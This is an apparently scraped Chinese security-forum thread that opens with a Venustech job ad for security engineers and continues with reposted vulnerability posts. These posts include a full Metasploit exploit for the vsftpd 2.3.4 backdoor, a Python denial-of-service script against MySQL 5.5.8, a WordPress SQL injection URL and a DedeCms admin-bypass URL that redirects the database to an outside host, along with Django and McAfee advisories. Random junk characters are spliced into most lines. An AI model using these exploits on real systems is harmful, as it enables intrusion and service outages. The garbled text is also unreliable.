最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    ) a" u" x- j9 e- M$ z5 J8 t, R) v! ]/ m

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    1 W+ f1 @' E: H! e/ P1 G5 {) d# D安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.
    : G* q8 e9 n$ \1 s5 L, E5 j8 H精通C语言编程

    2.
    9 y6 O4 ?$ B! ?+ \3 D* Q) T熟练使用Linux操作系统,精通 Linux下C语言编程

    3.- M; `/ J$ p" G4 f7 F  @
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.7 }& S2 {4 o( U7 f2 T8 c0 M5 `
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    0 O/ `, L4 x; }# W熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    3 P: I* J8 L1 ~负责产品的系统测试、集成测试工作

    2.
    3 \: L; e& U+ B0 c负责产品用例的编写,执行、修改

    3.& E- v0 w0 x: R
    负责产品性能的测试

    4.
    ' `5 ~# v7 p" ?0 [: C1 j0 k+ ]9 y负责对外项目的支持和测试工作

    岗位要求:

    1.! L1 Y( z6 y3 v2 P! J( ~3 N
    掌握基本的tcp/ip知识

    2.
    + Y7 t+ l; j, k3 B数通基础好

    3.
    " F0 l  w" i1 T* _- j/ U对linux有一定的基础

    4.
    5 O/ D; B4 ^1 B5 _* f- T  x掌握数据库的搭建和使用

    5.
    ' ~" x: j' [# M3 S: G/ d7 T至少熟悉一种编程语言C/Perl/VBS/TCL

    6.* C0 U! Q- R. g% Q! c! s. u9 M
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7./ J" H5 Z" y2 r# V% G# ~
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.
    : D7 {; j- e. T0 J! ?7 B$ h' j4 y对网络安全设备在网络中的部署有一定的认识

    9.& h" k5 v3 q0 f; F: M6 L
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    ' k; h0 V, C* o+ y
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    - H/ {% m/ U% Q3 v2 P3 {5 \; Z" r
    对服务客户的技术支持

    3.
    % ]3 V  }# H# m0 O+ B) ?
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    ! d1 }; S. A; j- ^; ^( @2 D
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    + V; e3 e9 ^5 m2 }! l5 T% R3 B" X
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    . y4 U/ `9 Q8 s6 `! F. m% z
    " E: d2 E6 r* B0 J, q  b8 b* L) D
    6 O! ?8 N$ s7 s+ b8 e' u2 ]# @- ]; H7 I: j+ Y
    require msf/core- ^8 _5 m- [& o% j- j5 ?9 e
    3 f* ]7 T& j, Q$ {! l
    class Metasploit3 < Msf::Exploit::Remote
    - W* Z# e. U# x  L8 URank = ExcellentRanking, n8 f- O$ t& w- y: N

    , ?0 L+ r; m. A; _3 T5 Hinclude Msf::Exploit::Remote::Tcp- D) q: O2 \4 L( K' A

    & B, G! X: D( h+ x1 w" Cdef initialize(info = {})
    # a/ M9 m& m9 C, N" ?super(update_info(info% g$ K/ O+ W- e8 ^: d4 |. Z, f
    Name => VSFTPD v2.3.4 Backdoor Command Execution4 z( {2 o; h$ \9 w& A* L! W2 Q
    Descript_ion => %q{
    ) T# C7 Y: n& uThis module exploits a malicious backdoor that was added to the VSFTPD download
    * ?2 d! D3 N7 `2 }0 u: m; j. Qarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between8 j: Q! S9 |& ?% L1 J
    June 30th 2011 and July 1st 2011 according to the most recent information0 F: K/ V9 z; ]3 \& \
    available. This backdoor was removed on July 3rd 2011.( G0 d" @0 Y" v+ X* C9 [; v
    }
    ! e2 x  D2 v& a8 ?- f0 C, B0 n0 d. tAuthor => [ hdm mc ]/ z) ~  D4 a" J  N, b5 W' Y* [
    License => MSF_LICENSE/ Q0 E% v8 a5 l! g3 h- b
    Version => $Revision: 13099 $5 i, y3 @1 ]6 }
    References =>
      X# y& ^# p" ?+ p4 Q[  z: u5 X, p7 }, i. x
    [ URL http://pastebin.com/AetT9sS5]+ W1 G4 Y; q4 Q( z+ n) l8 f) F/ w
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    7 Y& G9 h9 A* e( Y$ D]
    2 I% I: z3 V. {9 Z9 v# I0 ?8 bPrivileged => true2 D$ c* _/ I  B$ l! S  e3 f# u
    Platform => [ unix ]
    5 X5 W% z; L. p# m2 F. \  P$ PArch => ARCH_CMD
    7 Z' [5 @; t. ^: v0 ?Payload =>
    2 Y& j- I2 M$ _/ I$ m. k) F4 o{
    , A, v# q: V" m  c+ q4 ~6 _Space => 2000" j# z0 Z% _0 G( t8 x% |
    BadChars => 8 e2 K- l5 ^7 f. x2 J" _7 d7 S
    DisableNops => true
    * J% p4 a$ t+ D9 q$ PCompat =>
    8 A" Q) B& I% J' B# B{
    3 x9 e3 @0 R2 e3 h6 w5 R; _PayloadType => cmd_interact! p6 `( o4 ]* R' J9 C  A
    ConnectionType => find
    * V3 V1 e1 G5 P- H! V/ a1 _# }- z}, A/ L4 x6 K( g' E) m7 z
    }" n+ U% L3 z% z6 U
    Targets =>( R' d" G* S6 L% p% D$ B7 c
    [
    ! i4 E" @1 }  h4 k6 p( r[ Automatic { } ]: I; l3 o2 w8 F! \1 r
    ]
    . k) a2 G1 c/ z8 ^  g/ l9 YDisclosureDate => Jul 3 2011
    , O- k5 h3 s, {& r" o7 uDefaultTarget => 0))
    9 ^% S6 r, @: I/ D, ]; \) _+ O2 u3 k7 `, J
    register_options([ Opt::RPORT(21) ] self.class)
    & c9 o& N0 l" g% S- v+ ~end* b9 u3 X5 f; [. I5 {
    5 x# ~' U9 _: [* o6 ^# i
    def exploit- p+ w. j: v, J$ G

    : a, B$ r2 G  I; Jnsock = self.connect(false {RPORT => 6200}) rescue nil
    2 n. H0 k/ I. i1 O5 jif nsock
    $ ~0 D0 \+ X8 \: dprint_status(The port used by the backdoor bind listener is already open)$ \( o1 m& }$ H$ Z  U
    handle_backdoor(nsock)  c1 E5 \: M! I0 _* j% H0 e
    return
    / t8 v2 Z  C7 J* H9 y! M. hend
    , ?3 S; A% K9 k' g" Q% C
    + u6 E$ S& z9 S0 u) k# J' T5 d# Connect to the FTP service port first( D7 u+ l$ k/ v
    connect
    ! g" d5 E) s, {5 W1 Q) y- j/ {" Z% }
    6 H* u# h9 l8 l( r, ^3 n) dbanner = sock.get_once(-1 30).to_s
    ! L+ [4 ]3 x% N3 W' h, \0 rprint_status(Banner: #{banner.strip})
    - x5 y6 h) ~2 s; T: w1 ^
    : u* {4 z3 d$ Y3 x: z( B7 ^  nsock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)2 C' u% A3 ~' X) Q1 H6 R8 E
    ). m% I7 b5 X9 I5 l! r6 S, N2 j
    resp = sock.get_once(-1 30).to_s/ j0 m  b/ Q3 x! |7 C
    print_status(USER: #{resp.strip})2 Q6 k3 O: _" n
    : T* U* k+ }( r# c7 H
    if resp =~ /^530 /1 E! P3 B1 V3 d% K4 `
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    ; s) D- d% u% ^disconnect
      G) g8 ^! N2 y( ~( \return
    $ B  w1 m3 F1 S2 r; a& ^! }end& L, O6 \4 V8 t" l

    1 V' W* T: q2 f4 {) ~- Zif resp !~ /^331 /
    " @" z' V! I* k: e* Wprint_error(This server did not respond as expected: #{resp.strip})
    2 |% m, {6 p! X/ N& gdisconnect
    % f) c9 u! z6 O8 K# \return1 L3 \6 \" U) S, b% [6 |
    end
    % |+ ~. D! J( A+ n' g; d. U, y2 N* I7 h" p! j7 d7 R
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}% H3 J. e* ?6 A) W" P. L+ ]& z- Q3 @' @
    )
    + ^; ]" c, Y- P4 l$ g
    " r' M& _2 m- q3 H2 Y6 @# Do not bother reading the response from password just try the backdoor- n9 h" n3 p* b* |( D9 h2 X6 F! F
    nsock = self.connect(false {RPORT => 6200}) rescue nil0 c0 }4 N2 o  {
    if nsock& c4 o' n# ^  T$ f: ?
    print_good(Backdoor service has been spawned handling...)
    8 P. t: h2 H% d! @& z4 Ehandle_backdoor(nsock)
    . N- |3 J! b2 f  C! Rreturn; G7 G$ N, ~9 I+ p& _, l, w
    end7 B% H4 k  B, J3 o9 S2 U2 I+ T

    * g" Q. x% y  N0 edisconnect
    : m8 m3 x0 Q% x* C2 n- k4 ^* l& y8 X2 {. _, C! s
    end
    ) F# L  l2 g9 @/ {9 j* Q7 }* S
    ) }6 q0 q: B  y. p) tdef handle_backdoor(s)+ c3 ^. n0 `# L# ?

    9 M" t- U* y9 H+ c. y& r# [s.put(id* j2 ^% R0 ], a
    )- o2 Q0 I' @- Z# s

    * t( A8 E  ?* X! H8 Lr = s.get_once(-1 5).to_s& i& I  U6 b# D3 O5 K
    if r !~ /uid=/3 Z1 x2 I; @% T0 H! H6 n1 K7 k8 f
    print_error(The service on port 6200 does not appear to be a shell)+ q! D% Z6 ]5 D# ]0 I
    disconnect(s)
    1 ~4 F# W! @1 X7 _$ S8 Z) Greturn
    / `' J1 C- Z2 Z7 Rend" f$ p. Q7 d3 [1 \2 W% d: ?" V
    . J0 G) h: Y$ A- Y4 A6 K
    print_good(UID: #{r.strip})
    ; U5 E+ n: L, h* N: [* n' k; h' @" l: A
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
    % H/ L1 w9 [0 }8 a; a# [handler(s)2 b( S( K/ @) a" H2 B# N
    end; V: y% F3 W6 B- R1 I

    / F' g; @0 y2 l$ L0 m; F* Send复制代码, B5 v# G7 H  t$ |7 c& b  h

    + z# x+ p+ m4 |5 |/ G
    6 @3 h. ?+ [6 ~6 {, _! G1 f$ w& _7 h" k/ _2 `/ O( p& l3 k

    ) r: L: x& G# d# E: [% l' x6 t4 `- O# q0 b

    + B; n9 y/ G" [
    7 Y( l* t* ]  q; H  S" S0 D8 \
    7 \9 e% Z/ x, I+ D9 M- M8 ]
    0 ]# A) P1 @; o6 r5 A  X* k  E3 z) k2 p

    2 D+ E; j7 d9 Y" A- M% X
    # C+ b* o% T' y; A
    4 V) f6 e% l0 }3 Z& p$ {6 {+ D0 V. E; A8 t
    % A  Y4 e) x4 ]. g5 z- l0 z7 R

    , G/ \) P; b2 }; I0 E5 G/ g# G+ ?, [( w0 O0 q, V1 l
    5 C. s+ D  r; O9 C$ H
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:- U9 E5 O# H, Y. O
      
    3 _* z5 B0 o5 `# s7 c     
    7 _# ^9 V7 Z" t* u) m  + D# U" x- Y9 z7 C, X/ P4 l0 c
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    $ T5 i, S: Y$ ~! e, dallows an authenticated user to execute arbitrary SQL commands via the id
      @; Q+ ]1 B1 ~8 Z+ t. G0 oparameter to wp-admin/admin.php.
    1 _2 j; `# D* O  c  0 k# N1 C2 b4 E
       
    " U( ]$ a. o' L* W  ! Z( `& ?" B5 k5 d* M# N
    2. Proof of Concept:+ b# L0 C3 g% x  X$ g+ @" b; f4 }
      
    - w1 `4 S! C3 {# P. r% C" `   
    6 v- ^$ R7 l5 |5 U! D; B, P8 J  
    / t7 \- H" P( g# E  Whttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    / L8 E- U( ^; I9 i' e=1 AND SLEEP(10)
    " e- Y( A- s- L' ^5 }0 b3 Y' O! F( I* e4 ?& F; E" C9 @; {9 I
      / }( P1 Y3 v' |. F6 R  W
       
    1 n2 |9 I! Q1 u$ O  
    : j. w4 M0 R6 }6 m3. Solution:
    2 H& w( F( ?% U1 U9 O6 n  
    $ _0 A/ o7 \& G, O       z" l  j4 N9 f, U) f  E
      
    . S3 @' S( C% uThe plugin has been removed from WordPress. Deactivate the plug-in and wait
    * ~" O9 K7 m. w% ~1 ^/ M5 K4 @for a hotfix.- S6 n) ~! B; c. w% ]; r
      
    # M' O8 [5 @$ z9 w* c  b" ]. ?   
    / r# Q9 @7 p0 b0 [  2 G1 x( l$ P5 P# |* }- c
    4. Reference:. {1 F' V9 h/ R) |7 ?. T
      ! [: r0 f$ V, @4 M. U3 T
       3 ~2 [0 Z: Q3 K8 g' U, N' z
      
    ' B5 A% J4 a) s. Y7 v+ D) p- F( Uhttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    7 t. }- w( E1 a* W  }" ^* }* Cction-sqli/
    9 B9 {8 j8 G$ j( A  # a$ J* i: n1 V! U; e( _! I! m
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    8 Q: W- N/ ^; Q3 I/ y  ~9 O3 l  o9 c8 z0 L

    ( m0 N9 P" }+ m* p. n0 _0 S8 t6 s% U9 J  p% s' f% P8 x) ~% D
    5 W3 M! c0 d1 m

    6 p% _/ K  G4 U6 q! V
    / b4 y5 G: d, p7 p4 Z& ?. u- K: V) b6 t9 k- |( W1 _
    ; v& P% I7 j+ |& V& l2 r9 N

    ' p' d) U$ n4 S9 b% H8 a2 [2 t# J' g% G1 x' J

    4 \* e) E0 e5 X. D( q2 v$ c5 p7 c# w0 y; k* g( {: f

    , \. Q0 b/ U% w
    # z/ l/ h9 a3 o: L' t$ ]  g  V& }- x) A2 J+ }: F

    + O* H1 ~7 Z- i5 t. A% C/ j( q& a* M  I" Y2 q$ e- I

    $ ]4 E7 H$ P( Y4 T公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    7 u+ z# q9 v* j9 E1 b# a& ]1 q 9 e+ G& E" i+ N* J1 \( g
    print "
    2 S3 P5 M1 T$ u6 J0 V"
    - W' U; [: [$ s" x* {# X8 tprint "----------------------------------------------------------------"
    2 u5 M: K  m8 \; H; W7 B: Zprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
    * Q' k4 K1 g3 q& k' W2 qprint "| Level Smash the Stack                                         |"  X+ O, @3 V: X, G: y) y# A
    print "----------------------------------------------------------------"$ M: U. E  b8 _' A$ `7 @
    print "
    8 S  b5 ~/ T! W"6 K  a3 |( ^* l  b/ K4 B
    1 y+ \+ D% X; x1 m
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"4 Z: n4 w! x1 u* V3 f7 k. k. S
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    " L! V# x0 \' \% A% g% R5 w4 | " p; q, X, ^. p
    buf2=("x11x00x00x00x03set autocommit30")
    , J( ~! L) Q+ S$ C; \ 3 j0 I3 \. i9 F
    def usage():
    4 x; D" p! p( R+ c" y2 Q# O5 Gprint "usage : ./mysql.py <victim_ip>"! F3 |+ Y2 q; y1 u5 c; u/ e
    print "example: ./mysql.py 192.168.1.22"
    2 }; ^" c, @3 p( y
    4 P! T+ n0 {7 W( y2 C+ u% } % g& @7 N' k$ T  M9 E+ k8 K
    def main():
    , ~6 S- H0 R* r6 V0 C9 w  ?$ s2 y/ xif len(sys.argv) != 2:
    ! H* K( t$ q+ }) n1 V" busage()
    " J4 {# ^5 n2 H  w% }" }sys.exit()
    & s" _3 a5 s1 a$ \1 f$ bs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    6 r8 ]  C5 \- T9 m/ @
    # V, t; c! H* c9 n& fHOST = sys.argv[1]( v/ I6 r7 h) S* r1 z1 V
    PORT = int(3306)
    3 m7 |+ v# Y5 a' k% z/ ]s.connect((HOST,PORT))
    - }) q- r- c- t0 l/ t" }7 gprint "
  • Connect"
    4 n0 f5 R/ o) g9 ~( q5 Js.send(buf)
    2 T. `. C: C! m  m8 R3 e" kprint "
  • Payload 1 sent"- z3 h+ a* I0 H) k$ Y
    s.send(buf2)
    ) p' A/ j4 S3 `! |$ b9 Uprint "
  • Payload 2 sent
    0 z8 u# y1 f' m", "
  • Run again to ensure it is down..  M2 F/ m/ L4 ^/ K# h; O6 y# `: I1 R9 k
    "$ e. _4 S) o1 g. T5 S2 ~! V) r% d7 j. ]
    s.close()
    0 x0 ?$ P2 f. v8 C0 H) O
    ; S5 c' q, ?' q3 l/ Eif __name__ == "__main__":, d& D" S0 M. @! ]
    main()
    - V! E6 b% P% r2 ], K7 x8 ]
    / Y+ X$ }9 H8 s, H2 D# e" _5 J1 v/ ?5 ~$ Y
    8 A& H9 e& r0 O3 Z& d: _* ?0 U
    / w8 Q5 i% y, ?$ B5 o, s/ z+ ?4 G, e

    % {6 C" z# D% ~" r) B) Q( N% m2 g) L3 ^% j5 `
    / X/ q$ T1 s. v. S$ }: [
    ! |/ _$ j! h) s
    8 V% o! Z& b! c4 v# {( O. ]3 T- e

    % }- d8 V* z2 l4 T( _2 n! r% z+ w( u( G- v5 c; S
    . D3 t0 v7 C# l' \

    0 _% h  ~% E# B. x* p6 y6 ?# t3 J: h2 P1 W1 w7 a) H% K
    ! S2 M/ S/ {) t

    * c$ b- q: E- ~4 F% A4 d3 S$ h7 H6 k/ H

    , m1 b8 H4 ~4 t$ R7 t0 c公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    " h* M. c' L7 @5 E4 o3 G. E7 a! ]$ q3 g
    http://www.sitedir.com.cn/video/4.swf
    7 v% p$ u3 G2 a; @$ i3 I
    0 s- g+ k% }/ Z( {: t# d
      w. J* c( B9 T/ k. w* Z  G2 t( \) L1 t2 A# D
      q. s2 p& H( D" Y- O! M
    & o$ m1 Z' B, ^. U
    3 S$ C7 f" x) K- W' W: r6 v3 `  o. x0 x

    0 u4 j" o* l* L  S8 p5 U* f+ n8 ?! i3 ~; ]$ I& v
    9 R1 r# w- u8 s! `8 M8 V

    7 ?1 T& L0 H9 p/ _! B3 z. `
    0 X* I8 B& U( e8 X7 _
    , K4 {- ]- q/ ~$ g1 e+ ]: q* t; ?7 @# H* y" ?7 f; R7 k# p
    ; ^! p/ b. F2 F' k+ N$ {) g6 _5 f
    ' N0 E+ \& p: Z: z# r9 |: c9 s

    . l0 j. N9 H& S, ^! ?% }. d: b
    / C8 {! Q* M( t% p' c4 T
    2 H( u% x3 b6 z7 I0 a公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    9 i6 X! [& T# o/ ~+ W
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    1 p  z5 }2 W3 P' s8 d: h
    此漏洞的前提是必须得到后台路径才能实现
      Y# E  [& l' p( J7 I% v
    官方临时解决办法:
    ( Q7 d+ N8 H$ v* z) w
    找到include/common.inc.php文件,把:

    & A# i6 G; u" X$ ?/ c2 X1 H
        foreach($_REQUEST as $_k=>$_v)
    * K5 w& l9 F9 h0 W    {
    ' C0 o" S! E( c( X$ q2 j$ t        var_dump($_k);
    ) L) b2 j* {8 l        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    & B5 ?% L& B- }        {
    & T7 Z! X5 ~; _- z4 ?            exit('Request var not allow!');
    7 V2 w6 Y, w! }2 K$ o2 U        }
    ( W8 E/ u, r5 g% b* }6 d4 H    }
    ! S6 ~2 {9 z  I9 T6 R+ k+ e# x
    换成:

    ) x. U! C4 H5 p) y* r9 m
        //检查和注册外部提交的变量$ o; n; q, o1 Y( O$ v( Z) L
        function CheckRequest(&amp;$val) {
    6 m0 s1 C( ?' @& f/ ^6 o        if (is_array($val)) {
    # v6 @2 A% h3 J) r+ B3 u9 [            foreach ($val as $_k=>$_v) {( g$ e1 o7 m4 s+ R) }; V! @
                    CheckRequest($_k);
    " I0 K* v+ U  _! i9 l/ m                CheckRequest($val[$_k]);
    ! W( N  A# m5 N4 t' c  b. r5 S            }
    / G- h! I; W7 t- G        } else
    ( ^) i1 V9 w7 ]! H. e        {
    6 H8 X4 J; p1 P            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    / n4 U+ {9 r. q* P* U. V" Z            {2 e: E! i! m  N, H0 w8 E; ^
                    exit('Request var not allow!');( e# V$ J, S" U
                }
    - r7 ]" u$ m* b        }$ }! }: J  @: V/ f* m8 w
        }: D1 T- Z7 P- p: k
        CheckRequest($_REQUEST);
    $ O1 G: @8 \$ Q5 m% \

    # I) X+ n: x$ q0 W
    9 ?" a# B4 H. T5 c- G
    ) G- D# W0 \% c+ }. L
    ) v+ v! m  }6 i' ?& t) w/ ?( P0 Q1 ~; v( Y
    " }9 L6 j3 |& Z3 O( ?* y
    7 N7 O# k0 N* a5 R2 K
    . c' H3 z1 F/ d* @6 R

    & z6 R* O, d0 f- g1 U3 o
    - u/ q3 O1 f( |3 r. o- W; Q; v7 s  x1 D3 O/ E0 o9 u" T  ?( p6 Y
    " \: }1 C6 f  z# i' J

    ! P  k; m+ o& |2 O- W$ t% N) ^! l  H( l

    / {! F+ R5 D# \" F
    + s6 w7 J' k9 r6 J2 ?* B5 r9 r8 K9 X
    % @3 j4 Y# ?! l. i! q' @+ P6 K6 N# r, _' Y' F6 I

    , a+ h& x% d; L公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>) R7 b1 n* T5 O5 }

    8 b% B. ~2 v) O( r0 Lhttp://www.sitedir.com.cn/video/8.swf[/quote]
    ; ^8 L0 n- |0 ?7 M0 P+ L+ Z6 V
    ! ^$ p$ Z, e3 {6 h5 b$ m$ e+ Q' T7 i5 x1 N: d! [& P

    + O% ^7 Z- T% y  k* B' w
    3 L0 |) N+ {- t; r. v
    0 g1 v3 Y: y" \# b* T" J, ]: h0 {; _7 L- e% q
    , ?* L. S( `: I( m; N, W& _" E- M

    2 Y# h6 L9 A1 o
    / q3 u5 G( C/ l. ]. i0 t  e3 a- `4 o0 T* _' y0 b

    ' C  e; U( L8 z3 M* s1 m3 j% R5 |, ?; g* v/ p( P

    6 V& h+ k* m0 F, y# Q; A4 u% r& x7 z. B

    % K8 {! w4 H4 q5 m6 H( V0 o( ?) M8 m/ K7 ^- {  n

      h7 \% \# _5 a
    % R* N7 M2 X" N8 J  t2 H8 m" b公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    1 v8 p/ J, m, y7 T1 z4 v7 T9 }: @
    影响版本:
    . L! U3 g. i3 ~& F7 VDjango 1.2.5
    7 L5 y5 b) u( ]# G# w, uDjango 1.3 beta 1. Z, Y5 h8 L+ \; z
    Django 1.2.43 q* X& A! A: p/ H6 G6 l% [8 Z
    Django 1.2.2
    : E8 v; a: Y/ ]& C7 FDjango 1.2

    2 {# f1 }9 d. a7 c" k
    漏洞描述:
    8 p# v: ^% F& [6 x  {
    Django是一款开放源代码的Web应用框架,由Python写成。
    , N4 u1 u$ }; r; h+ [3 L' IDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    + d' }* Q8 v* `0 V- }# [1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    1 @" Y" u) o1 @: _2 b' M2 o2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
    4 M3 C4 e! m6 P( ^- |1 e3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    1 e! P  @3 f! z9 n' ~: R4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    ) ]* f! S% F, q$ e
    细节参考:
    + |" E9 q4 ]. dhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/: C% C6 h, R4 v2 T- D8 K
    http://secunia.com/advisories/45939/
    0 c" i6 k! j! J" {9 f/ j

    ; i- s# p# J4 [8 x1 s
    : M6 j8 G' T8 T8 E- I5 y2 Y) I8 a4 i! {( c6 M
    # N) R. T/ t" r& \! z

      {# b" f" s: F+ ^
      X7 l; [9 O8 j; U( l- F* o5 M  u$ w2 u6 s: ?0 }  B8 s

    4 G7 Q8 g2 w0 D6 T- K
    ( Z  `& G0 \) f, }! o/ F  G. }- I1 }
    % |* [& b: e9 u# K8 l( j4 F8 x  M- H
    9 ~2 Q# I! S* f+ {8 }* A' ~8 Z% {% Q7 v1 V' W. [

    : I; E- c" S4 J) s1 l  c1 Y% \! K  Y) z

    0 Q. a7 t; D+ D# L! ^4 `. }/ v6 t7 D/ W" ^) E0 e  b

    ( K+ K7 ~% G0 v6 N
    . E; {4 w: L  |2 f/ v1 r4 E1 ~
    ' B# }! ], ?! C: x0 C( E公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    " n8 i& B% m1 _# a; R影响版本: McAfee LinuxShield <= 1.5.1
    0 Y, `5 b9 c9 v" Y  r: y远程攻击: Yes 9 s5 l1 T- B: t8 I  b9 [1 l% b0 r
    本地溢出: Yes
      D: A& W6 X, }- n: h背景阅读:7 h1 N( Z( l/ Z! {! d: C* q
    ===========
    ( \$ ^( e" ]& Q5 L6 [+ j/ |5 r% T- R" B, D( ]: z* U2 J
    LinuxShield detects and removes viruses and other potentially unwanted
    9 X" h; G0 N  Y! W/ Zsoftware on Linux-based systems. LinuxShield uses the powerful McAfee+ L3 s' S- G" E1 P# n
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our+ D$ R' n* M1 |& B
    anti-virus products.  w& P! Z+ Q! N4 v, J

    & ?4 ?* E; H) z: f& h: g, EAlthough a few years ago, the Linux operating system was considered a4 q. ^' Q& k& p& D( ?3 {# C- j
    secure environment, it is now seeing more occurrences of software+ R* N# B) C% x. o% T, {/ k
    specifically written to attack or exploit security weaknesses in3 K2 ]' I+ ^+ z/ c, ]
    Linux-based systems. Increasingly, Linux-based systems interact with1 j9 O# y5 Z% V1 L$ z* y" n
    Windows-based computers. Although viruses written to attack Windows-
    3 E& r: E0 A+ M: G& S7 ~0 f5 ubased systems do not directly attack Linux systems, a Linux server3 o6 D) V6 R% d
    can harbor these viruses, ready to infect any client that connects to
    2 E- \, f5 ?8 Y7 ~it./ W. M; p& J1 [0 U, c
    & d( H4 X; l% M2 o1 F
    When installed on your Linux systems, LinuxShield provides protection
    ( V6 F/ u6 F, W( i4 vagainst viruses, Trojan horses, and other types of potentially
    # {8 t+ [5 m9 T+ ?2 {unwanted software.9 k" X# i' u) \
    ) t) p: ~! v" G! A1 o  O0 s
    LinuxShield scans files as they are opened and closed$ p* o% H, a7 {' D( G! i  ^
    ?&amp;#65533;&amp;#65533; a technique0 \* s0 Y" S; @3 |3 |
    known as on-access scanning. LinuxShield also incorporates an
    0 D. Q0 @' b/ `on-demand scanner that enables you to scan any directory or file in, x+ i# ~7 P& E( q5 o, O0 l
    your host at any time.
    - x+ s4 l3 Q0 x2 ~. }' B$ g( j6 \5 _# L  M$ C
    When kept up-to-date with the latest virus-definition (DAT) files,8 A( w) @/ R% Y) L# a: n4 k, w( \% r% Q
